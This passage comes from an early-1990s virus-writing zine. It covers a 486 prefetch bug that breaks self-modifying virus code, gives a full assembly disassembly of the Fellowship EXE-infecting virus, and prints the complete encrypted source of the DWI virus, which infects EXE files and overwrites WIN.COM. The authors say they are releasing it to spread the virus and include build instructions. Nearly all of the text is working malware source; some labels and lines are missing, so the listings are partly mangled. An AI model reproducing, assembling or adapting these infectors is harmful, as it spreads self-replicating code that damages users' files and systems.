        add     word ptr [JumpAdd+2], ax        ; add to jmp far ptr

        db      0eah
JumpAdd dd      00000100h       ; cs:0100

        end start

        It  crashes miserably on my  machine, but not on my 8086. I now know
 why. Hurredly, I recoded the thing to look like this:

.model tiny
        org     100h

        mov     byte ptr [start], 0cch          ; place int 3 at 100h

        mov     ax, cs                          ; codeseg in ax

        add     word ptr [JumpAdd+2], ax        ; add to jmp far ptr

        jmp     short aftajump

        db      0eah
JumpAdd dd      00000100h       ; cs:0100
        jmp     short prejump

        end start

        This time,  the code works, I have my cuprit, my processor, and it's
 blasted 25 byte prefetch.

        Let me  explain. When  we affected the JMP  FAR offset in memory, we
 did not  affect it in the processor, which pre-fetches the next 25 bytes in
 memory. The JMP  around the code  causes the prefetch to  be reloaded,  and
 allows the jump to work.

        So, this means, an entire group of viruses will not work on newer hi
 end machines. I  tested this, all  viruses I ran  that had the DA engine in 
 them crashed and burned on every  486 that I tested them on. Any 80486 that
 is exactly  Intel specs (and they all will be for a while, as only Intel is
 making them) will crash on this code.

        The solution? Here's mine, it may not be pretty, but, it works.

            mov  ax,es                    ; AX = PSP segment
            add  ax,10h                   ; Adjust for PSP
            add  word ptr cs:[si+stacksave+2], ax
            cli                           ; Clear intrpts for stack manip.
            mov  sp,word ptr cs:[si+stacksave]
            mov  ss,ax
            mov  bx, word ptr cs:[si+jmpsave]
            add  bx, ax
            push bx

            mov  bx, word ptr cs:[si+jmpsave+2]
            add  bx, ax
            push bx

jmpsave          dd ?                ; Original CS:IP
stacksave        dd ?                ; Original SS:SP
jmpsave2         dd 0fff00000h       ; Needed for carrier file
stacksave2       dd ?

        This is the final code we put into DWI and VioLite2. Not pretty, but
 the damn thing  works. With  no self-modifying  code  that  relies  on  the
 prefetch, there isn't an easy way for this to crash...
                      Disassembly of the Fellowship Virus
                           By The Attitude Adjuster

        Well, I thought that I  should just continue disassembling whatever
 I could  find, as  part  of  that 'keeping  up  my  skills.' I found this, 
 decided  that it was a piece of uneventful and thouroghly boring, and none
 the more bug free code, and decided that you should have it...
        It seems  to  have  a semi-unique  way  of organization  during the
 memory residency...  the loading  of the host again, etc... also, there is
 a  tiny bit  of  debugger resistance,  but, this tactic  could be expanded
 upon to create huge amounts of hell for non-protected mode debuggers.
        Really, this  thing  shouldn't  work... if  it  follows theory,  it
 should eat  all available  handles on  the system after a few (more for us
 with higher FILES= settings) infections...
        This is what Patti says... notice, this is an EXE infector, yet one
 of the symptoms is COM growth! Wild... I never found that subroutine while
 I was disassembling...
 Virus Name:  Fellowship
 Aliases:     1022, Better World, Fellow
 V Status:    Rare
 Discovered:  July, 1990
 Isolated:    Australia
 Symptoms:    TSR; .COM & .EXE file growth
 Origin:      Malaysia
 Eff Length:  1,019 - 1,027 Bytes
 Type Code:   PRsE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan, F-Prot, NAV, IBM Scan, AVTK, Novi, Sweep,
                    CPAV, UTScan, VirexPC, Gobbler2, VBuster, AllSafe,
                    ViruSafe, UTScan, Trend, Iris, VNet, Panda, VET,
                    Detect+, IBMAV, DrVirus, Vi-Spy,
                    NShld, LProt, CPAV/N, Sweep/N
 Removal Instructions:  CleanUp, F-Prot, NAV, or delete infected files

 General Comments:
       The Fellowship or 1022 virus was isolated in Australia in July 1990.
       Fellowship is a memory resident generic infector of .EXE files.  It
       does not infect .COM or overlay files.

       The first time a program infected with the Fellowship virus is
       executed, the virus will install itself memory resident as a 2,048
       byte TSR in low system memory.  Available free memory will be
       decreased by a corresponding 2,048 bytes.  Interrupt 21 will also
       now be controlled by the virus.

       After the virus is memory resident, the virus will infect .EXE files
       when they are executed.  Infected .EXE files will increase in size
       by between 1,019 and 1,027 bytes.  The virus's code will be located
       at the end of infected files.

       Infected files will contain the following text strings very close to
       the end of the file:

             "This message is dedicated to
              all fellow PC users on Earth
              Toward A Better Tomorrow
              And A Better Place To Live In"

             "03/03/90 KV KL MAL"

       This virus is believed to have originated in Kuala Lumpur, Malaysia.
; Disassembly of the Fellowship Virus, done by The Attitude Adjuster for        
; Infectious Diseases Issue 3.

; For a byte-for-byte matchup, assemble as follows:
;  tasm fellow /m2
;  tlink fellow

.model tiny  
        org     000h
        mov     ax, 0D000h                              ; RUTHERE call
        int     21h
        cmp     bx, 1234h
        jne     installvirus                            ; if not...
        mov     bx, es
        add     bx, 10h                                 ; account for PSP
        add     word ptr cs:[oldcsip+2], bx             ; add to CS
        jmp     dword ptr cs:[oldcsip]                  ; get there...

ninthflag       db      0

paramblock:                                             ; need defs? get a
 envsegment     dw      0CE4h                           ; DOS manual...
 cmdlineoffset  db       80h,  00h
 cmdlinesegment dw      12C9h
 fcb1offset     db       5Ch,  00h
 fcb1segment    dw      12C9h
 fcb2offset     db       6Ch,  00h
 fcb2segment    dw      12C9h
 loadpoint      dw      0

oldcsip         dd      0FFF00000h

        cld                                             ; !!!
        push    es
        mov     bx, es
        add     bx, 10h                                 ; account for PSP
        mov     es, bx                                  ; ES = 1st EXE Seg
        xor     bx, bx
        mov     ds, bx                                  ; DS = 0000
        push    word ptr ds:[0000]                      ; save ssi vector
        push    word ptr ds:[0002]                      ; save ssi vector
        mov     word ptr ds:[0000], 0A5F3h              ; set ssi vector
        mov     byte ptr ds:[0002], 0CFh                ; 0CF00:0A5F3h
        xor     si, si
        mov     di, si
        push    cs
        pop     ds
        mov     ax, 64h                                 ; program entry
        mov     cx, endwrite-start                      ; zopy ieterations
        pushf                                           ; fake an interrupt
        push    es                                      ; return to 1st seg
        push    ax
        db      0EAh                                    ; jmp far ptr 0:0000
        db      00h,  00h,  00h,  00h
        ; on the fake interrupt call, control is transferred to 0000:0000,
        ; which contains

      ; rep     movsb
      ; iret
        ; the movsb takes care of copying the virus to offset 0000 of the
        ; 1st EXE segment, and then the iret returns the virus to the
        ; entry point below!

        xor     ax, ax
        mov     ds, ax
        pop     word ptr ds:[0000]                      ; restore ssi vector
        pop     word ptr ds:[0002]
        sti                                             ; finally... yeesh!
        pop     es                                      ; PSP segment
        mov     bx, 80h
        mov     ax, 4A00h                               ; decrease allocation
        int     21h                                     ; of PSP segment
        push    cs
        pop     ds
        mov     ax, es
        mov     cmdlinesegment, ax                      ; construct exec
        mov     fcb1segment, ax                         ; parameter block
        mov     fcb2segment, ax                         ; (see block above)
        mov     ax, es:[002Ch]
        mov     envsegment, ax
        mov     ax, 3521h                               ; get int 21h vector
        int     21h
        mov     word ptr ds:[Old21], bx                 ; save vector
        mov     word ptr ds:[Old21+2], es
        mov     dx, offset int_21h_entry                ; set int 21h vectr
        mov     ax, 2521h
        int     21h
        mov     ah, 2Ah                                 ; get date
        int     21h
        cmp     dh, 9                                   ; the ninth?
        jne     dontsetflag
        or      byte ptr cs:[ninthflag], 1              ; flop that flipper
        mov     es, envsegment                          ; environment segmnt
        xor     di, di
        mov     cx, 0FFFFh
        mov     al, 0
        repne   scasb                                   ; scan until we
        cmp     es:[di], al                             ; meet a dupe of
        jne     searchloop                              ; ourselves!
        mov     dx, di
        add     dx, 3
        push    es                                      ; DS = PSP segment
        pop     ds
        mov     bx, cs                                  ; stack in us
        mov     ss, bx                                  ; might clear ints!!
        mov     es, bx
        mov     sp, 44Bh                                ; stack at 44bh
        mov     bx, offset paramblock
        mov     ax, 4B00h                               ; load + exec host
        pushf                                           ; fake int 21h
        call    dword ptr cs:[Old21]
        mov     es, cs:[envsegment]                     ; release memory
        mov     ax, 4900h
        int     21h
        mov     dx, 80h                                 ; terminate and keep
        mov     ax, 3100h                               ; us resident!
        int     21h

filesave        dw      469h,  74Bh
old24           dw      156h,  74Bh
savedvalu1      dw      8E0h
savedvalu2      dw      0
oldattr         dw      20h
readbuffer      db      4Dh
                db       5Ah, 0DBh,  00h,  07h,  00h,  00h
                db       00h,  20h,  00h,  00h,  00h, 0FFh
                db      0FFh,  00h,  00h,  00h,  00h
negativechksm   dw      1990h
                db       00h,  00h,  6Eh,  00h,  3Eh
                db      39 dup (0)
        xor     al, al
        cmp     ax, 0D000h                              ; RUTHERE?
        jne     checkforexecute                         ; No...
        mov     bx, 1234h

        cmp     ax, 4B00h                               ; load + execute?
        je      yeahyeahbaby                            ; yepparoo
        db      0EAh                                    ; jmp far orig 21h
old21   db      9Eh,  10h,  16h,  01h
        dw      ?, ?                                    ; ?!?

        push    bp                                      ; save caller's
        push    ax                                      ; registers
        push    bx
        push    cx
        push    dx
        push    di
        push    si
        push    es
        push    ds
        test    byte ptr cs:[ninthflag], 1              ; test that flipper
        jz      notflagged
        jmp     itstheninthhoney

        mov     word ptr cs:[filesave], dx              ; save file seg:ofs
        mov     word ptr cs:[filesave+2], ds
        mov     si, dx
        mov     ah, 19h                                 ; get default drive
        int     21h
        mov     dl, al                                  ; drive code in DL
        cmp     byte ptr [si+1], 3Ah                    ; 2nd letter a ":"
        jne     notonanotherdisk
        mov     dl, byte ptr [si]                       ; get letter
        sub     dl, 'A'                                 ; reduce to d-code
        inc     dl                                      ; add 1, differing fc
        mov     ah, 36h                                 ; get free space
        int     21h
        cmp     ax, 0FFFFh                              ; error?
        je      getthefuckback
        xor     dx, dx
        mul     bx                                      ; avail. sectors
        mul     cx                                      ; avail. bytes
        cmp     ax, 7D0h                                ; enough left?
        jae     enoughleftdoit
        or      dx, dx                                  ; more than 65535?
        jnz     enoughleftdoit

        pop     ds                                      ; restore caller's
        pop     es                                      ; registers
        pop     si
        pop     di
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        pop     bp
        mov     ax, 4B00h
        jmp     dword ptr cs:[Old21]                    ; go to old 21h

        les     di, dword ptr cs:[filesave]             ; ES:DI = File seg:ofs
        mov     cx, 0FFFFh
        mov     al, 0
        repne   scasb                                   ; hunt out end
        mov     al, es:[di-2]
        and     al, 5Fh                                 ; capitalize
        cmp     al, 45h                                 ; 'E'
        jne     getthefuckback                          ; non an EXE!
        lds     dx, dword ptr cs:[filesave]             ; DS:DX = File seg:ofs
        mov     ax, 3D00h                               ; open file
        int     21h
        jc      getthefuckback
        mov     bx, ax                                  ; !!!
        push    cs
        pop     ds
        mov     dx, offset readbuffer                   ; read exe header
        mov     cx, 1Ch
        mov     ax, 3F00h
        int     21h
        jc      closeitupandleave                       ; oh, the sins...

        cmp     word ptr [negativechksm], 1990h         ; infected?
        jne     getonwithit
        mov     ax, 3E00h                               ; close file
        int     21h
        jmp     short getthefuckback

        mov     ax, 3524h                               ; get int 24h vector
        int     21h
        mov     word ptr [Old24], bx                    ; save it
        mov     word ptr [Old24+2], es
        mov     dx, offset int_24h_entry                ; set int 24f vector
        mov     ax, 2524h
        int     21h
        lds     dx, dword ptr filesave                  ; DS:DX = file seg:ofs
        mov     ax, 4300h
        int     21h                                     ; get attributes
        jc      whatapity                               ; to err is computer
        mov     word ptr cs:[oldattr], cx               ; save attributes
        and     cx, 0FEh                                ; blank the boring
        mov     ax, 4301h
        int     21h                                     ; change attributes
        jnc     nowramitinthere
        lds     dx, dword ptr cs:[Old24]                ; restore int 24h
        mov     ax, 2524h                               ; vector
        int     21h
        jmp     getthefuckback

        lds     dx, dword ptr cs:[filesave]             ; DS:DX = file seg:ofs
        mov     ax, 3D02h                               ; open read/write
        int     21h
        jc      whatapity
        mov     bx, ax                                  ; !!!
        push    cs
        pop     ds
        mov     cx, 200h                                ; 512 (bytes per par)
        mov     si, offset readbuffer                   ; header!
        mov     ax, [si+16h]                            ; initial CS
        mov     word ptr [oldcsip+2], ax
        mov     ax, [si+14h]                            ; initial IP
        mov     word ptr [oldcsip], ax
        mov     ax, [si+4]                              ; paragraphs
        cmp     word ptr [si+2], 0                      ; bizzare quirk
        je      notquirky
        dec     ax
        mul     cx                                      ; dx:ax = bytes 
        add     ax, [si+2]                              ; add modulo
        adc     dx, 0
        add     ax, 0Fh                                 ; add 16 mo'
        adc     dx, 0
        and     ax, 0FFF0h
        mov     word ptr [savedvalu1], ax               ; save new CS:IP
        mov     word ptr [savedvalu2], dx               ; (still in bytes!!)
        add     ax, endwrite-start                      ; add virus length
        adc     dx, 0
        div     cx                                      ; cx in paragraphs
        or      dx, dx
        jz      notquirkier
        inc     ax                                      ; quirk again
        mov     [si+4], ax                              ; replace paragraphs
        mov     [si+2], dx                              ; replace modulo

        mov     ax, word ptr [savedvalu1]               ; load saved CS:IP
        mov     dx, word ptr [savedvalu2]               ; (still in bytes!!)
        mov     cx, 10h                                 ; paragraphs
        div     cx
        sub     ax, [si+8]                              ; loose header size
        mov     [si+16h], ax                            ; replace IP
        mov     ax, 0
        mov     [si+14h], ax                            ; replace cs
        mov     word ptr [si+12h], 1990h                ; show as infected
        mov     dx, word ptr [savedvalu1]               ; move to end as
        mov     cx, word ptr [savedvalu2]               ; shown by header
        mov     ax, 4200h
        int     21h
        mov     cx, endwrite-start                      ; write the virus!
        mov     dx, offset ds:[0]
        mov     ax, 4000h                               ; !!!
        int     21h
        jc      thisistheendmyonlyfriend                ; an error, this far?
        xor     cx, cx                                  ; seek top
        mov     dx, cx                                  ; !!!
        mov     ax, 4200h
        int     21h

        mov     dx, offset readbuffer                   ; write buffer
        mov     cx, 1Ch
        mov     ax, 4000h
        int     21h

        mov     ax, 3E00h                               ; close file
        int     21h
        lds     dx, dword ptr [filesave]                ; DS:DX = File Seg:ofs
        mov     cx, cs:[oldattr]                        ; restore attribs
        mov     ax, 4301h
        int     21h
        jmp     whatapity                               ; restore int 24h

savemode        db      0
charcolor       db      0
nicemessage1    db      'This message is dedicated to  

nicemessage2    db      'all fellow PC users on Earth  

nicemessage3    db      '  Towards A Better Tomorrow   

nicemessage4    db      'And A Better Place To Live In 

        push    cs
        pop     ds
        mov     ah, 0Fh                                 ; get video mode
        int     10h
        mov     byte ptr [savemode], al                 ; save mode

        mov     ax, 5                                   ; set mode 40x25
        int     10h
        mov     byte ptr [charcolor], 1
        mov     dh, 9
        call    setcursor
        mov     dx, offset nicemessage1
        call    printstring
        mov     dh, 0Ah
        call    setcursor
        mov     dx, offset nicemessage2
        call    printstring
        mov     byte ptr [charcolor], 2
        mov     dh, 0Ch
        call    setcursor
        mov     dx, offset nicemessage3
        call    printstring
        mov     dh, 0Dh
        call    setcursor
        mov     dx, offset nicemessage4
        call    printstring
        mov     cx, 0FFFFh                              ; kill time
        loop    killloop
        xor     ax, ax                                  ; wait fo' a key
        int     16h
        mov     al, byte ptr [savemode]                 ; restore old mode
        mov     ah, 0                                   ; on the vid
        int     10h
        jmp     getthefuckback                          ; GO HOME!
        mov     si, dx
        cmp     al, '

        je      alldoneprinting                         ; end of string
        mov     ah, 0Eh                                 ; write a byte
        mov     bh, 0                                   ; to tha' vid
        mov     bl, byte ptr [charcolor]
        int     10h
        jmp     short printloop
        mov     dl, 5                                   ; set cursor pos
        mov     ah, 2
        mov     bh, 0
        int     10h
        db      ' 03/03/90 KV KL MAL '                  ; whee...
        end     start
; Stand alone demonstration of the Fellowship Virus activation routine.

; Assemble with:
;  tasm fbomb /m2
;  tlinl fbomb /t

.model tiny  
        org     0100h
        jmp     short itstheninthhoney

savemode        db      0
charcolor       db      0
nicemessage1    db      'This message is dedicated to  

nicemessage2    db      'all fellow PC users on Earth  

nicemessage3    db      '  Towards A Better Tomorrow   

nicemessage4    db      'And A Better Place To Live In 

        push    cs
        pop     ds
        mov     ah, 0Fh                                 ; get video mode
        int     10h
        mov     byte ptr [savemode], al                 ; save mode

        mov     ax, 5                                   ; set mode 40x25
        int     10h
        mov     byte ptr [charcolor], 1
        mov     dh, 9
        call    setcursor
        mov     dx, offset nicemessage1
        call    printstring
        mov     dh, 0Ah
        call    setcursor
        mov     dx, offset nicemessage2
        call    printstring
        mov     byte ptr [charcolor], 2
        mov     dh, 0Ch
        call    setcursor
        mov     dx, offset nicemessage3
        call    printstring
        mov     dh, 0Dh
        call    setcursor
        mov     dx, offset nicemessage4
        call    printstring
        mov     cx, 0FFFFh                              ; kill time
        loop    killloop
        xor     ax, ax                                  ; wait fo' a key
        int     16h
        mov     al, byte ptr [savemode]                 ; restore old mode
        mov     ah, 0                                   ; on the vid
        int     10h
        int     20h  

        mov     si, dx
        cmp     al, '

        je      alldoneprinting                         ; end of string
        mov     ah, 0Eh                                 ; write a byte
        mov     bh, 0                                   ; to tha' vid
        mov     bl, byte ptr [charcolor]
        int     10h
        jmp     short printloop
        mov     dl, 5                                   ; set cursor pos
        mov     ah, 2
        mov     bh, 0
        int     10h
        db      ' 03/03/90 KV KL MAL '                  ; whee...
        end     start

                              DWI Virus Source
                   By The Attitude Adjuster and AccuPunk

        Here's  the source to one of our new older viruses... Both 'Punk and
 I  did a  little bit  on this  one, but,  'Punk thought it all up... I just
 kinda fucked  around with  the code  when he  said he  was bored with it...
 Anyway,  I can't  really give you too much help here, as this code isn't at
 all the greatest, but, I include it to get this virus out into the world.

        Umm,  assemble  two pass,  and  link to an EXE. Modfiy the header to
 make  the maximum  memory  allocation equal  to the minimum, and the fucker
 should run...  I'm  really not  going to test it  right now, mainly because
 it's late, and I AM releasing this tonight...
Virus Name:  Damn Windows Idiot!
Aliases:     Anti-Windows
Author(s):   AccuPunk/The Attitude Adjuster
Group:       Virulent Graffiti
Scan ID:     [DWI]   
V Status:    Abortion
Discovery:   Well, see, we were in LIST.COM and we saw this code...
Symptoms:    EXE growth; messages; something to do with WIN.COM
Orgin:       WestBumbleFuck, Ohio   DipShitPeak, New York
Eff Length:  1063 Bytes
Res Length:  1280 Bytes
Type Code:   PRhE - Parasitic Resident EXE Infector
Detection Method:
Removal Instructions: Cry... Delete Windows... Increase wallet space,
  hire and Antivirus Professional ("...two words together that can't
  make sense!").

General Comments:

        DWI will become resident after first checking for it's own
        presence in memory. DWI places itself into high memory, and
        changes it's MCB owner to the usual DOS MCB owner segment.
        This may be changed to retrive the DOS MCB owner from DOS,
        in the future, but this suffices at the present.

        Int 21h is revectored to Int 30h where the virus uses it for
        DOS calls. The FAR PTR at Int 30h+1 is lost.

        Upon the execution of any program using Int 21h/Ax=4B00h, DWI
        will check the file for an 'MZ' header, and if found, infect
        the file, leaving the time, date, and attributes of the file

        DWI seems to have an adverse effect on WIN.COM when it is run.

        Other than the offensive WIN.COM program, DWI will not harm any
        data... If DESQView is found, the host system owner will be wired
        $100,000 for choosing a decent multitasking operating system...
        err... maybe not, but, we'll not screw any .COM files.

Strings Contained in the Virus:        
        '[DWI] AccuPunk/The Attitude Adjuster Virulent Graffiti'

Future Revision Notes:

        There will probably be no future revisions of DWI. We may optomize
        it a little, and rip the engine for use in a planned virus, but,
        as I said, there will probably be no DWI-B.

; [][]   []      [] [][][]   "Damned Windows Idiot!" or Anti-Windows...
; [] ][  []      []   []     
; []  [] []      []   []          An original Viral Artform by
; []  [] []  []  []   []      AccuPunk and The Attitude Adjuster of
; [] ][  [] ][][ []   []     Virulent Graffiti, 216/513/914/602/703!
; [][]    ][    ][  [][][]

;       "Hey, you... with the shitty logo... Yeah, you! Get over here!"

.model tiny
        org     100h

id_word   equ   '1V'                                    ; Marker Word
                                                        ; V1 in Lil' Endian
     mov       bx, offset endcrypt                      ; Virus Start
     mov       cx, (end_write-endcrypt)/2               ; Ieterations
     mov       dx, 0000h                                ; Xor Word
     xor       word ptr cs:[bx], dx                     ; Xor It (CS Ovr'rd)
     ror       word ptr cs:[bx], 1                      ; Roll it Right!
     inc       bx
     inc       bx
     loop      Crypt_Loop

     push      ds es                                    ; Save Segments
     push      cs cs                                    ; CS=DS=ES
     pop       ds es
     mov       ax, 0ABCDh                               ; R-U-There?
     int       21h  
     cmp       ax, 6969h                                ; Ax=6969h Vir_Ident    
     jne       put_vir_in_mem                           ; No.

     pop       es ds                                    ; Restore Segments

     mov       ax, es                                   ; AX = PSP segment
     add       ax, 10h                                  ; Adjust for PSP
     mov       cx, ax

     add       ax, word ptr cs:[stacksave]              ; Adjust SS
     mov       sp, word ptr cs:[stacksave+2]            ; Set SP
     mov       ss, ax                                   ; Set SS
     mov       bx, word ptr cs:[jmpsave+2]              ; Adjust CodeSeg
     add       bx, cx
     push      bx                                       ; Save It

     mov       bx, word ptr cs:[jmpsave]                ; Load IP
     push      bx                                       ; Save It

     retf                                               ; Exit Virus

jmpsave        dd 0fff00000h                            ; Point to INT 20h
stacksave      dd ?                                     ; Nada.

     xor       ax,ax                                    ; Interrupt Table
     mov       ds,ax
     les       bx, dword ptr ds:[21h*4]                 ; Int 21h Vector
     mov       word ptr cs:[old_int_21], bx             ; Save Int 21h
     mov       word ptr ds:[30h*4],bx                   ; Revector 30h
     mov       word ptr cs:[old_int_21+2], es
     mov       word ptr ds:[30h*4+2], es
     push      cs cs                                    ; Restore Segments 
     pop       es ds
     mov       ax, 5800h                                ; Get Mem Alloc
     int       21h

     push      ax                                       ; Save Strategy

     mov       bx, 2
     mov       ax, 5801h                                ; Set to Last Fit
     int       21h

     mov       bx, ((end_vir - entry) / 16) + 1
     mov       ah, 48h                                  ; Allocate Block
     int       21h

     push      ax                                       ; Returned in AX
     sub       ax, 10h                                  ; Base Ofs 100h
     mov       es, ax                                   ; Our Segment
     mov       di, 100h                                 ; Entry = 100h
     mov       si, di                                   ; Entry = 100h
     mov       cx, end_write - entry                    ; Bytes to Zopy
     rep       movsb
     xor       cx, cx                                   ; Interrupt Table
     push      cx     
     pop       ds

     mov       word ptr ds:[21h*4], offset Int_21_handler     ; Set Int 21h
     mov       word ptr ds:[21h*4+2], ax

     pop       ax
     sub       ax, 1
     mov       es, ax                                   ; Point To MCB
     mov       word ptr es:[0001], 0008                 ; Config = 0008h

     mov       ax, 5801h                                ; Reset Strategy
     pop       bx
     int       21h
     jmp       exit                                     ; Exit Stub

     push      ax bx cx dx si di bp es ds               ; Save Registers
     cmp       ax, 0ABCDh                               ; R-U-There? 
     je        r_u_there

     cmp       ax, 4B00h                                ; DOS Exec? 
     je        exec_call

     pop       ds es bp di si dx cx bx ax               ; Restore Registers
     db        0eah                                     ; JMP XXXX:YYYY
old_int_21     dd   ?

     xor       ax,ax                                    ; Interrupt Table
     mov       ds,ax
     les       ax, dword ptr cs:[Old24]                 ; Get Int 24h Vector
     mov       word ptr ds:[24h*4], Ax                  ; And Replace It
     mov       word ptr ds:[24h*4+2], Es
     jmp       back_to_dos

     mov       bp, sp                                   ; Alter AX On Stack
     mov       word ptr [bp+10h], 6969h
     jmp       end_int_21

     xor       ax,ax                                    ; Revector Int 24h
     mov       ds,ax
     les       ax, DWord Ptr ds:[24h*4]
     mov       word ptr cs:[Old24], ax                  ; Save Old Vector
     mov       word ptr cs:[Old24+2], es
     mov       word ptr ds:[24h*4], Offset My24         ; With Our Vector
     mov       word ptr ds:[24h*4+2], cs

     pop       es                                       ; Caller's Ds in Es
     push      es
     mov       di, dx                                   ; ES:DI -> filename
     push      cs
     pop       ds                                       ; DS:SI -> "WIN.COM"
     mov       si, offset win_com
     push      si

     pop       si
     push      si
     lodsb                                              ; AL = "W" 
     mov       cx, 128
     repnz     scasb                                    ; Scan For "W"
     je        check_it                                 ; Got a "W", Check It
     pop       si
     jmp       infect                                   ; Not WIN.COM

     mov       cl, 7

     lodsb                                              ; Load Next Character
     scasb                                              ; and Check it
     jne       find_top                                 ; Leave if < >
     loop      check_char

     pop       si
     push      es
     pop       ds
     mov       ax, 3d02h                                ; Open WIN.COM        
     int       30h

     xchg      ax,bx                                    ; Handle in BX

     push      cs
     pop       ds

     mov       ah, 40h                                  ; Write WIN.COM
     mov       cx, (my24-win_exit)-1
     mov       dx, offset win_exit                      ; with CD 20h
     int       30h
     mov       ah, 3eh                                  ; Close File
     int       30h
     mov       ah, 9                                    ; Show User Message
     mov       dx, offset win_msg
     int       30h
     pop       ds es bp di si dx cx bx ax               ; Restore Registers

infect:                                                 ; File Infection
     push      es
     pop       ds

     mov       si, dx                                   ; DS:SI -> filename
     push      cs
     pop       es             
     mov       di, offset fname
LoopAgain:                                              ; Copy filename into
     lodsb                                              ; Our CodeSeg.
     or        al,al
     jnz       LoopAgain
     push      cs                                       ; CS=DS=ES
     pop       ds
     xor       ax, ax                                   ; Get Attributes 
     call      attributes

     mov       word ptr [fattr], cx                     ; Save Attributes

     mov       ax, 3D00h                                ; Open File
     int       30h       
     jc        bad_exe

     xchg      ax, bx                                   ; BX = File Handle
     mov       ax, 5700h                                ; Get File Date/Time
     int       30h
     mov       ftime, cx                                ; Save Time
     mov       fdate, dx                                ; And Date
     mov       ah, 3Fh                                  ; Read Header
     mov       cx, 1ah
     mov       dx, offset buffer                        ; Into Buffer
     int       30h     

     call      LSeekEnd                                 ; LSeek the End

     push      dx                                       ; Save File Size
     push      ax

     mov       ah, 3Eh                                  ; Close File
     int       30h
     cmp       word ptr [buffer], 'ZM'
     jne       worse_exe                                ; Not an EXE File

     cmp       word ptr [buffer+12h], id_word
     jne       good_exe                                 ; Not Infected

     pop       dx                                       ; Remove Saved File
     pop       dx                                       ; Size
     jmp       remove_locks                             ; Abort Infection

     mov       al, 01h                                  ; Overwrite Attribs
     xor       cx, cx
     call      attributes     
     jc        worse_exe                                ; Catch Write-Prot
                                                        ; Discs Here
     push      cs
     pop       es
     mov       si, offset buffer + 14h                  ; Save Initial CS:IP
     mov       di, offset jmpsave                       ; In Segment
     sub       si, 10                                   ; Save Initial SS:SP
     pop       ax dx                                    ; Retrive File Size
     push      ax dx                                    ; Save It

     add       ax, offset end_write - offset entry
     adc       dx, 0
     mov       cx, 512                                  ; Pages 512 Bytes
     div       cx             
     or        dx, dx
     jz        no_round
     inc       ax                                       ; Rounding Quirk

     mov       word ptr [buffer + 4], ax                ; Set Total 512 pages
     mov       word ptr [buffer + 2], dx                ; Set Total mod 512

     mov       ax, word ptr [buffer + 0Ah]              ; Get Minimum
     add       ax, (end_write - entry)/16               ; Add our Size
     mov       word ptr [buffer + 0ah], ax              ; Put us in Minimum
     mov       word ptr [buffer + 0ch], ax              ; and in the Maximum
     pop       dx ax                                    ; Retrieve File Size
     mov       cl, 4
     mov       bx, word ptr [buffer + 8]
     shl       bx, cl                                   ; BX = Header Size
     sub       ax, bx
     sbb       dx, 0                                    ; Subtract Header
     mov       cx, 10h        
     div       cx                                       ; Change To Para/Rem
     or        dx, dx
     jz        no_padding
     sub       cx, dx                                   ; CX = Bytes to Pad
     inc       ax

     push      cx                                       ; Save Pad Bytes
     sub       ax, 10h        
     mov       word ptr [buffer + 14h], offset entry           ; Set IP
     mov       word ptr [buffer + 16h], ax                     ; Set CS
     mov       word ptr [buffer + 0Eh], ax                     ; Set SS
     mov       word ptr [buffer + 10h], offset end_vir+100h    ; Set SP

     mov       word ptr [buffer + 12h], id_word         ; Set ID Word
                                                        ; Negative Checksum
     mov       ax, 3D02h                                ; Open File
     mov       dx, offset fname
     int       30h
     xchg      ax, bx                                   ; BX = File Handle

     mov       ah, 40h                                  ; Write File
     mov       cx, 1Ah
     mov       dx, offset buffer
     int       30h

     call      LSeekEnd                                 ; LSeek to End
     pop       cx                                       ; Retrieve Padding
     cmp       cx, 16    
     je        no_fixup                                 ; None Needed
     mov       ah, 40h                                  ; Write File
     int       30h

     mov       ah, 2ch                                  ; Get Time
     int       21h

     mov       word ptr [Valu+1], Dx                    ; New Crypt Valu
     mov       si, offset writeret                      ; Copy Write
     mov       di, offset tempcrypt                     ; Routine
     mov       cx, (end_write-writeret)
     rep       movsb
     call      tempcrypt                                ; Call Write Routine

     mov       ax, 5701h                                ; Set File Time/Date
     mov       cx, ftime
     mov       dx, fdate
     int       30h
     mov       ah, 3Eh                                  ; Close File
     int       30h

     mov       al, 01h                                  ; Reset Attribs
     mov       cx, fattr
     call      attributes

     jmp       remove_locks                             ; Remove Int 24h

vir_ident      db   0,'[DWI] AccuPunk/'                 ; Virus and Author
               db     'The Attitude Adjuster'           ; Idents
vir_group      db   0,'Virulent Graffiti',0             ; Group Ident

win_com        db   'WIN.COM',0                         ; Target File
win_exit       db   0cdh, 20h                           ; DOS Exit
win_msg        db   0dh,0ah                             ; Message
               db   'You''ve been caught, you DWI! You''re nothing '
               db   'but a Damn  Windows  Idiot!',0dh,0ah
               db   'Well, we at Virulent Graffiti have  had it...  '
               db   'you''re  not going  to be',0dh,0ah
               db   'running that bullshit for a while, ''cuz, hey, '
               db   'friends don''t let friends',0dh,0ah
               db   'use Windows!  (and you''re damn right we''re '
               db   'your friends!)',0dh,0ah,'

my24:                                                   ; Error Handler
     mov       al, 3                                    ; Process Terminate

Attributes:                                             ; Get/Set
     mov       ah, 43h
     mov       dx, offset fname
     int       30h

     mov       ax, 4202h                                ; LSeek from End
     xor       cx, cx
     cwd                                                ; XOR DX, DX
     int       30h                                      ; Kudos DA

     push      bx                                       ; Handle

     mov       bx, offset endcrypt                      ; Virus Start
     mov       cx, (end_write-endcrypt)/2               ; Ieterations
     mov       dx, Word Ptr [Valu+1]                    ; Xor Word
     rol       word ptr [bx], 1                         ; Roll it Left!
     xor       word ptr [bx], dx                        ; Xor It 
     inc       bx
     inc       bx
     loop      Crypt_Loop2
     pop       bx                                       ; Handle

     mov       ah, 40h                                  ; Write File
     mov       cx, end_write - entry
     mov       dx, offset entry
     int       30h
     push      bx                                       ; Handle
     mov       bx, offset endcrypt                      ; Virus Start
     mov       cx, (end_write-endcrypt)/2               ; Ieterations
     mov       dx, Word Ptr [Valu+1]                    ; Xor Word     
     xor       word ptr [bx], dx                        ; Xor It
     ror       word ptr [bx], 1                         ; Roll it Left!
     inc       bx
     inc       bx
     loop      Crypt_Loop3
     pop       bx                                       ; Handle
     ret                                                ; Return

  old24          dd   0                                 ; Int 24h Vector
  buffer         db   1Ah dup (0)                       ; EXE Read Buffer
  fname          db   128 dup (0)                       ; Filename Buffer
  fdate          dw   0                                 ; OldFileDate
  ftime          dw   0                                 ; OldFileTime
  fattr          dw   0                                 ; OldFileAttr
                 db   (end_write-writeret) Dup(0)       ; Write Routine

     end       entry     
